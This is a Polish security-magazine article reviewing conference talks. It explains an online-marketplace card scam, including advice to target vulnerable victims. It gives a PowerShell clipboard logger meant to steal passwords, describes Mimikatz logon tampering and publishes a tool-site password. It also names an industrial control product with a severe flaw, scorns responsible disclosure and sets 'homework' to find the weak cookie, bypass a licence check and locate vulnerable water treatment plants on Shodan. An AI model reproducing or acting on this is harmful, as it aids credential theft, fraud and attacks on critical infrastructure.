Tak, mamuty naprawdę żyją. W każdym razie na Białorusi, skąd migrują m.in. do Polski. Możliwe wręcz, iż masz mamuta w rodzinie! Chcesz wiedzieć więcej? Zapraszamy do lektury! Tylko u nas, bo był zakaz nagrywania!
Pełna agenda konferencji znajduje się tutaj.
Tak naprawdę nie zamierzamy opisywać wszystkich prezentacji - to zostawimy Adamowi. Poniżej skupimy się przede wszystkim na tych kilku prezentacjach, które naszym zdaniem wnoszą jakąś wartość dla osób zajmujących się ofensywnym bezpieczeństwem IT - w tym 2 z nich były Live Only, czyli jeżeli ktoś chciał je mieć, musiał je sobie nagrać samodzielnie.
Więc co z tymi mamutami?
Zdecydowanie najciekawsza z całej konferencji była prezentacja Agaty Ślusarek, omawiająca proces "skrobania mamutów", o którego istnieniu - przyznajemy - w ogóle nie mieliśmy pojęcia. Prezentacja Agaty była niestety jedną z tych Live Only - więc o ile oczywiście ją sobie nagraliśmy, to udostępnić jej nie możemy (podobnie jak transkryptu).
No dobra, ale o co chodzi z tymi mamutami? Otóż tytułowe mamuty to ofiary scamu "na kupującego", a więc np. sprzedawcy na portalach typu OLX, do których zgłaszają się oszuści (zwani workerami, czyli robotnikami) z ofertą "zakupu".
Na czym polega oszustwo? Otóż taki "kupujący" nie płaci za pośrednictwem serwisu, ale przesyła sprzedawcy specjalny link do pośrednika, który rzekomo umożliwia odebranie pieniędzy z dokonanej przez kupującego wpłaty. Pośrednik ten jest jednak fałszywy - prawdziwe są jedynie dane karty kredytowej, które sprzedawca w dobrej wierze wpisuje na tej stronie, aby odebrać pieniądze właśnie na tą kartę.
Ale jak to? Przecież istnieją zabezpieczenia typu 3D Secure, które wymuszają dodatkową autoryzację? Ano istnieją - dlatego też na tym "transakcja" się nie kończy. Po drugiej stronie tego pośrednika siedzi worker, który momentalnie dokonuje zakupu na możliwie podobną kwotę - tyle iż tym razem w prawdziwym sklepie. Prawdziwy jest też adres - tyle iż należy on do paczkomatu, na którym trop się urywa.
Następnie worker otrzymuje ze sklepu dane do płatności i inicjuje tą płatność z karty sprzedającego - czyli tej, na którą sprzedający miał dostać pieniądze. A wówczas sprzedający dostaje na telefon powiadomienie z kwotą - i jeżeli zatwierdzi transakcję nie czytając dokładnie jej opisu, a sugerując się tylko jej kwotą i tym, iż właśnie miał taką kwotę dostać - wówczas nieświadomie zautoryzuje płatność przez oszusta.
Tego typu schemat nie jest niczym nowym - natomiast w przypadku powstałego w lutym 2020 na Białorusi Winky Teamu, organizacja całego procederu stoi na niespotykanym dotychczas poziomie - od podziału ról, przez budowę skryptów do obsługi "klienta" dużo lepszej jakości, niż w niejednym legalnym call center, kulturę współpracy z szeregowymi workerami, materiały szkoleniowe, czy warunki finansowe - aż po takie pozornie nieistotne szczegóły jak dopracowana szata graficzna.
Jeśli zaciekawił Was ten proceder, więcej dowiecie się z tego artykułu (niestety po białorusku). Oto kilka najciekawszych cytatów:
Zgodnie z warunkami "mamutowej ławki" każdy "pracownik" mógł odebrać 65-70% skradzionych środków (podobno jest to powszechny "margines"). Kwoty, od których naliczono "bonus", mogą być zupełnie inne: gdzieś jest to 80 rubli, a innym razem - ponad 1000 (tyle udało ci się ukraść na raz). Tylko na przykład 12 października naliczyliśmy około 80 wpłat, łączna kwota sprzeniewierzonych pieniędzy - ponad 21 tysięcy rubli. Nie wiemy, jak długo były "zarabiane". Prawdopodobnie na "dzień roboczy".
Dzięki "Kozakowi na wygnaniu" mogliśmy jednym okiem spojrzeć na "dokumentację" - o tym, jak dzieło jest zbudowane. Starają się brać pod uwagę wszystkie aspekty interakcji z ofiarami, wydają zalecenia: na przykład, iż powinieneś wybrać najbardziej wrażliwe segmenty populacji, do których należą "mamy", "użytkownicy powyżej 30 roku życia" i "nowi użytkownicy" (którzy nie do końca zdają sobie sprawę, jak to wszystko działa).
Wspominany jest także skrypt o nazwie Kufar, w wersjach 1.0 i 2.0.
Co tam, panie, w prokuraturze słychać?
Na konferencji Adama Haertle nie mogło oczywiście zabraknąć dr Agnieszki Gryszczyńskiej, która, co zabawne, mówiła m.in. o wysypie oszustw z użyciem fałszywych bramek płatniczych w dobie pandemii koronawirusa, prawdopodobnie choćby nie wiedząc, iż w sporym stopniu zazębia się to z tym, o czym chwilę później miała mówić Agata. Najciekawszym tematem tej prezentacji była jednak różnica pomiędzy artykułami 286 i 287 Kodeksu karnego.
Teraz dla odmiany trochę Powershella
Aby nie przynudzać całym kontekstem - oto prosty skrypt w Powershellu (można go choćby przerobić na jednolinijkowiec do odpalania z poziomu Rubber Ducky), służący do zrzucania co sekundę zawartości schowka zalogowanego użytkownika do pliku. Proste i wygodne rozwiązanie do przechwytywania haseł kopiowanych z menedżera haseł do np. przeglądarki:
for (;;) {
$clip = Get-Clipboard -format text
$clip >> C:\Users\Public\fileOnlySave.tmp
Start-Sleep 1
}
Paula Januszkiewicz i jej CQTools
Pauli Januszkiewicz przedstawiać adekwatnie nie trzeba. Zdecydowanie natomiast warto będzie obejrzeć jej prezentację, gdy już wzorem prezentacji z edycji 2020, trafi ona do sieci.
Paula w przystępny sposób pokazuje, jak Mimikatzem w trybie naprawy systemu, podmienić w Windows "cached logon data", ustawiając własne hasło - a następnie zalogować się tym hasłem po restarcie komputera.
Drugi temat tej prezentacji, to co można wyciągnąć z Active Directory, mając prawa administratora domeny - i kiedy da się po takim ataku "posprzątać", a kiedy zostaje już tylko reinstalacja całego AD.
Bardzo ważnym elementem tej prezentacji były darmowe narzędzia CQTools, stworzone przez firmę Pauli, CQURE. Narzędzia te można pobrać ze strony https://resources.cqureacademy.com/tools/, podając login student i hasło CQUREAcademy#123! (w razie gdyby ktoś to hasło zmienił, w Internecie można łatwo znaleźć kopię tych narzędzi). Z tego PDF dowiesz się, co te narzędzia potrafią.
KAPE
Będąc już w temacie narzędzi analitycznych i forensicowych, musimy koniecznie wspomnieć o repozytorium https://github.com/EricZimmerman/KapeFiles. Wydaje nam się, iż była o nim mowa w prezentacji Wojciecha Klickiego z Fundacji Panoptykon, aczkolwiek nie mamy stuprocentowej pewności.
Dużo ważniejsze jest jednak to, co jest w tym repozytorium - a są to pliki w formacie Yaml, opisujące w sposób deklaratywny, jakie dane warto na gwałtownie wydobyć z systemu Windows, aby móc później przeprowadzić zdalną analizę śledczą takiego systemu. Każdy plik opisuje jeden temat, np. logi Windows Firewalla, profile konfiguracyjne programu AnyDesk, poczta i ustawienia programu Thunderbird, czy setki innych.
Wojciech Pilszak
Wojtek, znany Wam już z ubiegłorocznych artykułów o stylometrii (tego i tego), w tym roku m.in. wspomniał listę narzędzi OSINT-owych, jakich używa w firmie. Są to (w wymienionej kolejności): Buscador, OSINTUX, Autopsy, CSI Linux, Parrot OS, oraz nasz ulubiony Kali Linux.
Służby specjalne(j troski)
Akcentem humorystycznym było wystąpienie Kamila Gorynia, który wypunktował różne śmieszne wpadki służb - w tym ABW, którego zapowiadanej wizyty w redakcji się do dzisiaj nie doczekaliśmy...
Wschodząca gwiazda
Jeśli nie słyszeliście wcześniej nazwiska Mateusz Chrobok ani nie widzieliście jego filmów - witajcie w klubie, my też zobaczyliśmy je po raz pierwszy ze 2 tygodnie temu. Gość ma niesamowity potencjał. Od tego, co mówił na konferencji, ważniejsze jest jak mówił. To jest naszym zdaniem przyszłość, jeżeli chodzi o sposób docierania z tematami ITSEC do masowego odbiorcy.
Jak mógł sterować polskim przemysłem, po raz kolejny...
Jeśli ciekawi Was tematyka systemów SCADA, pewnie widzieliście już poprzednie części tej prezentacji - tą i tą.
Dzisiaj, w trzeciej części, która również była prezentacją Live Only, Marcin opowiadał o systemie WebHMI, którego wersję ewaluacyjną mógł pobrać za darmo z Internetu (w postaci obrazu maszyny VirtualBox - dostępny jest też obraz systemu plików dla Raspberry Pi, z którym wg nas jest wygodniej pracować) i przeanalizować jej kod PHP w poszukiwaniu potencjalnych podatności.
A dlaczego prezentacja była Live Only? Otóż dlatego, iż podatność taką znalazł i było to od razu 10/10. A pomimo zgłoszenia jeszcze w sierpniu, do dzisiaj nie ma jeszcze formalnie nadanego numeru CVE. Dlatego też Marcin próbował ukryć przed widzami, iż chodzi o system WebHMI.
Dlaczego więc ujawniamy nazwę tego systemu?
Jesteśmy pod wrażeniem pracy Marcina. Jednak jego podejście wpisuje się w nurt nowotworu trawiącego branżę ITSEC, określanego jako "responsible disclosure" - czyli w istocie wyróżniania pewnych grup odbiorców ponad innych. Staramy się wyrównywać szanse owych "innych" tam, gdzie jesteśmy w stanie.
Zadanie domowe dla chętnych
Wy też mieliście w szkole zadania domowe podstawowe i dla chętnych? No to zabawmy się w takie zadanie:
- Czy obraz WebHMI przez cały czas można ściągnąć z Internetu za darmo?
- Dobierz się do kodu (jest w katalogu /www rozpakowanego obrazu) i znajdź pełną wersję nazwy ciasteczka słabo weryfikowanego przez plik /files.php, którą Marcin próbował ukryć.
- Czy omawiany przez Marcina błąd został już poprawiony? (aktualizacja na podstawie odpowiedzi Marcina: "Producent wypuścił poprawkę 12.10.2021, ale nie został jeszcze nadany numer CVE. w tej chwili większość instancji systemu została już zaktualizowana.")
- A czy dość luźne sprawdzanie $_SESSION["notrialcheck"] również poprawili? Czy przez cały czas pozwala to nabywcom podstawowej wersji komercyjnej zrobić sobie lekki upgrade funkcjonalny za darmo?
- Czy potrafisz odnaleźć w Shodanie którąś z oczyszczalni z tą podatnością? Oczywiście po to, by czym prędzej powiadomić odpowiednie osoby, iż powinny dokonać aktualizacji, na wypadek gdyby urządzenia z jakiegoś powodu nie zaktualizowały się automatycznie 🙂
- Mając roota na kontrolerze, co można przez taki panel zmienić i do jakich potencjalnych strat doprowadzić? Pamiętaj, iż to pytanie jest czysto teoretyczne - patrz niżej 🙂
ps. Dla osób wybierających zadanie podstawowe, podpowiedź brzmi: X-WH-SESSION-ID.
I to tyle
Prezentacji było oczywiście dużo więcej, natomiast nie wyłapaliśmy na nich nic potencjalnie przydatnego dla Was. Oczywiście mogliśmy coś przegapić - ciężko się ogląda po 3 prezentacje jednocześnie, w tym niektóre Live Only prowadzone jednocześnie. Ale za takie ułożenie harmonogramu musicie już podziękować Adamowi. Tymczasem jeżeli faktycznie przegapiliśmy coś ciekawego, dajcie nam znać - uzupełnimy.
Intencją autorów ani wydawcy treści prezentowanych w magazynie PAYLOAD nie jest namawianie bądź zachęcanie do łamania prawa. jeżeli popełniłeś lub masz zamiar popełnić przestępstwo, bądź masz wątpliwości, czy Twoje działania nie będą łamać prawa, powinieneś skonsultować się z najbliższą jednostką Policji lub Prokuratury, a jeżeli są one związane z pieniędzmi, dla pewności również z Urzędem Skarbowym.
Nie zezwala się na użycie treści prezentowanych w magazynie PAYLOAD, ani produktów dostępnych w sklepie PAYLOAD, do celów popełniania przestępstw lub przestępstw skarbowych.